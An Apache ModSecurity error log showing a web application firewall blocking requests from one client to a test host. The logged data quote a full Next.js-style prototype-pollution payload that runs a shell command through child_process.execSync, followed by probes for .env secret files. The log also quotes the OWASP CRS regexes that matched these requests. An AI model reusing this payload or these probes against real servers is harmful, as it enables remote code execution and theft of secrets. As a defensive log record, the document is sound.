[Mon Jan 26 21:24:15.410093 2026] [:error] [pid 1675789] [client 45.148.10.143:46714] [client 45.148.10.143] ModSecurity: Warning. Pattern match "(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\"\\\\s]*(?:[\\\\w'\\"\\\\./]+/|[\\\\\\\\'\\"\\\\^]*\\\\w[\\\\\\\\'\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\"/\\\\\\\\]*\\\\\\\\)?[\\"\\\\^]*(?:s[\\"\\\\^]*(?:y[\\"\\\\^]*s[\\"\\\\^]*(?:t[\\"\\\\^]*e[\\"\\\\^]*m[\\"\\\\^]*(?:p[\\"\\\\^]*r[\\"\\\\^]*o[\\"\\\\^]*p[\\"\\\\^]*e ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "298"] [id "932115"] [msg "Remote Command Execution: Windows Command Injection"] [data "Matched Data: {timeout found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))',{timeout:5000}).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x..."] [severity "CRITICAL"] [ver "OWASP_CRS/3 [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aXfNb8psbZfsFdDQrpqAOwAAAAI"]
[Mon Jan 26 21:24:15.410184 2026] [:error] [pid 1675789] [client 45.148.10.143:46714] [client 45.148.10.143] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: $((41*271)) found within ARGS:0: {then:$1:__proto__:then status:resolved_model reason:-1 value:{then:$b1337} _response:{_prefix:var res=process.mainmodule.require(child_process).execsync(echo $((41*271)) {timeout:5000}).tostring(base64) throw object.assign(new error(next_redirect) {digest:`next_redirect push/login?a=${res} 307 `}) _chunks:$q2 _formdata:{get:$1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aXfNb8psbZfsFdDQrpqAOwAAAAI"]
[Mon Jan 26 21:24:15.410591 2026] [:error] [pid 1675789] [client 45.148.10.143:46714] [client 45.148.10.143] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: 'base64 found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))',{timeout:5000}).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aXfNb8psbZfsFdDQrpqAOwAAAAI"]
[Mon Jan 26 21:24:15.411435 2026] [:error] [pid 1675789] [client 45.148.10.143:46714] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 20)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aXfNb8psbZfsFdDQrpqAOwAAAAI"]
[Mon Jan 26 21:24:15.411581 2026] [:error] [pid 1675789] [client 45.148.10.143:46714] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 20 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=15,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 20, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aXfNb8psbZfsFdDQrpqAOwAAAAI"]
[Mon Jan 26 21:24:15.434484 2026] [:error] [pid 1675789] [client 45.148.10.143:46714] [client 45.148.10.143] ModSecurity: Warning. Pattern match "(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\".*\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\"]*(?:s[\\\\\\\\'\\"]* ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "160"] [id "932105"] [msg "Remote Command Execution: Unix Command Injection"] [data "Matched Data: {timeout found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))',{timeout:5000}).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2. [hostname "autumnus.test.indacotrentino.com"] [uri "/_next"] [unique_id "aXfNb8psbZfsFdDQrpqAPAAAAAI"]
[Mon Jan 26 21:24:15.434603 2026] [:error] [pid 1675789] [client 45.148.10.143:46714] [client 45.148.10.143] ModSecurity: Warning. Pattern match "(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\"\\\\s]*(?:[\\\\w'\\"\\\\./]+/|[\\\\\\\\'\\"\\\\^]*\\\\w[\\\\\\\\'\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\"/\\\\\\\\]*\\\\\\\\)?[\\"\\\\^]*(?:s[\\"\\\\^]*(?:y[\\"\\\\^]*s[\\"\\\\^]*(?:t[\\"\\\\^]*e[\\"\\\\^]*m[\\"\\\\^]*(?:p[\\"\\\\^]*r[\\"\\\\^]*o[\\"\\\\^]*p[\\"\\\\^]*e ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "298"] [id "932115"] [msg "Remote Command Execution: Windows Command Injection"] [data "Matched Data: {timeout found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))',{timeout:5000}).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x..."] [severity "CRITICAL"] [ver "OWASP_CRS/3 [hostname "autumnus.test.indacotrentino.com"] [uri "/_next"] [unique_id "aXfNb8psbZfsFdDQrpqAPAAAAAI"]
[Mon Jan 26 21:24:15.434680 2026] [:error] [pid 1675789] [client 45.148.10.143:46714] [client 45.148.10.143] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: $((41*271)) found within ARGS:0: {then:$1:__proto__:then status:resolved_model reason:-1 value:{then:$b1337} _response:{_prefix:var res=process.mainmodule.require(child_process).execsync(echo $((41*271)) {timeout:5000}).tostring(base64) throw object.assign(new error(next_redirect) {digest:`next_redirect push/login?a=${res} 307 `}) _chunks:$q2 _formdata:{get:$1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "autumnus.test.indacotrentino.com"] [uri "/_next"] [unique_id "aXfNb8psbZfsFdDQrpqAPAAAAAI"]
[Mon Jan 26 21:24:15.435081 2026] [:error] [pid 1675789] [client 45.148.10.143:46714] [client 45.148.10.143] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: 'base64 found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))',{timeout:5000}).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "autumnus.test.indacotrentino.com"] [uri "/_next"] [unique_id "aXfNb8psbZfsFdDQrpqAPAAAAAI"]
[Mon Jan 26 21:24:15.435895 2026] [:error] [pid 1675789] [client 45.148.10.143:46714] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 20)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/_next"] [unique_id "aXfNb8psbZfsFdDQrpqAPAAAAAI"]
[Mon Jan 26 21:24:15.436031 2026] [:error] [pid 1675789] [client 45.148.10.143:46714] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 20 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=15,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 20, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/_next"] [unique_id "aXfNb8psbZfsFdDQrpqAPAAAAAI"]
[Mon Jan 26 21:24:15.457135 2026] [:error] [pid 1675789] [client 45.148.10.143:46714] [client 45.148.10.143] ModSecurity: Warning. Pattern match "(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\".*\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\"]*(?:s[\\\\\\\\'\\"]* ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "160"] [id "932105"] [msg "Remote Command Execution: Unix Command Injection"] [data "Matched Data: {timeout found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))',{timeout:5000}).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2. [hostname "autumnus.test.indacotrentino.com"] [uri "/api"] [unique_id "aXfNb8psbZfsFdDQrpqAPQAAAAI"]
[Mon Jan 26 21:24:15.457279 2026] [:error] [pid 1675789] [client 45.148.10.143:46714] [client 45.148.10.143] ModSecurity: Warning. Pattern match "(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\"\\\\s]*(?:[\\\\w'\\"\\\\./]+/|[\\\\\\\\'\\"\\\\^]*\\\\w[\\\\\\\\'\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\"/\\\\\\\\]*\\\\\\\\)?[\\"\\\\^]*(?:s[\\"\\\\^]*(?:y[\\"\\\\^]*s[\\"\\\\^]*(?:t[\\"\\\\^]*e[\\"\\\\^]*m[\\"\\\\^]*(?:p[\\"\\\\^]*r[\\"\\\\^]*o[\\"\\\\^]*p[\\"\\\\^]*e ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "298"] [id "932115"] [msg "Remote Command Execution: Windows Command Injection"] [data "Matched Data: {timeout found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))',{timeout:5000}).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x..."] [severity "CRITICAL"] [ver "OWASP_CRS/3 [hostname "autumnus.test.indacotrentino.com"] [uri "/api"] [unique_id "aXfNb8psbZfsFdDQrpqAPQAAAAI"]
[Mon Jan 26 21:24:15.457353 2026] [:error] [pid 1675789] [client 45.148.10.143:46714] [client 45.148.10.143] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: $((41*271)) found within ARGS:0: {then:$1:__proto__:then status:resolved_model reason:-1 value:{then:$b1337} _response:{_prefix:var res=process.mainmodule.require(child_process).execsync(echo $((41*271)) {timeout:5000}).tostring(base64) throw object.assign(new error(next_redirect) {digest:`next_redirect push/login?a=${res} 307 `}) _chunks:$q2 _formdata:{get:$1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api"] [unique_id "aXfNb8psbZfsFdDQrpqAPQAAAAI"]
[Mon Jan 26 21:24:15.457702 2026] [:error] [pid 1675789] [client 45.148.10.143:46714] [client 45.148.10.143] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: 'base64 found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))',{timeout:5000}).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "autumnus.test.indacotrentino.com"] [uri "/api"] [unique_id "aXfNb8psbZfsFdDQrpqAPQAAAAI"]
[Mon Jan 26 21:24:15.458536 2026] [:error] [pid 1675789] [client 45.148.10.143:46714] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 20)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api"] [unique_id "aXfNb8psbZfsFdDQrpqAPQAAAAI"]
[Mon Jan 26 21:24:15.458675 2026] [:error] [pid 1675789] [client 45.148.10.143:46714] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 20 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=15,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 20, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api"] [unique_id "aXfNb8psbZfsFdDQrpqAPQAAAAI"]
[Mon Jan 26 21:24:15.583573 2026] [:error] [pid 1675794] [client 45.148.10.143:46718] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aXfNbzsp5zRKVOBo1RPAPgAAAA0"]
[Mon Jan 26 21:24:15.583835 2026] [:error] [pid 1675794] [client 45.148.10.143:46718] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aXfNbzsp5zRKVOBo1RPAPgAAAA0"]
[Mon Jan 26 21:24:15.583975 2026] [:error] [pid 1675794] [client 45.148.10.143:46718] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aXfNbzsp5zRKVOBo1RPAPgAAAA0"]
[Mon Jan 26 21:24:15.659516 2026] [:error] [pid 1675794] [client 45.148.10.143:46718] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aXfNbzsp5zRKVOBo1RPAQQAAAA0"]
[Mon Jan 26 21:24:15.659703 2026] [:error] [pid 1675794] [client 45.148.10.143:46718] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aXfNbzsp5zRKVOBo1RPAQQAAAA0"]
[Mon Jan 26 21:24:15.659852 2026] [:error] [pid 1675794] [client 45.148.10.143:46718] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aXfNbzsp5zRKVOBo1RPAQQAAAA0"]
[Mon Jan 26 21:24:15.680640 2026] [:error] [pid 1675794] [client 45.148.10.143:46718] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /env/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aXfNbzsp5zRKVOBo1RPAQgAAAA0"]
[Mon Jan 26 21:24:15.680813 2026] [:error] [pid 1675794] [client 45.148.10.143:46718] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aXfNbzsp5zRKVOBo1RPAQgAAAA0"]
[Mon Jan 26 21:24:15.680966 2026] [:error] [pid 1675794] [client 45.148.10.143:46718] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aXfNbzsp5zRKVOBo1RPAQgAAAA0"]
[Mon Jan 26 21:24:15.705014 2026] [:error] [pid 1675794] [client 45.148.10.143:46718] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aXfNbzsp5zRKVOBo1RPAQwAAAA0"]
[Mon Jan 26 21:24:15.705176 2026] [:error] [pid 1675794] [client 45.148.10.143:46718] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aXfNbzsp5zRKVOBo1RPAQwAAAA0"]
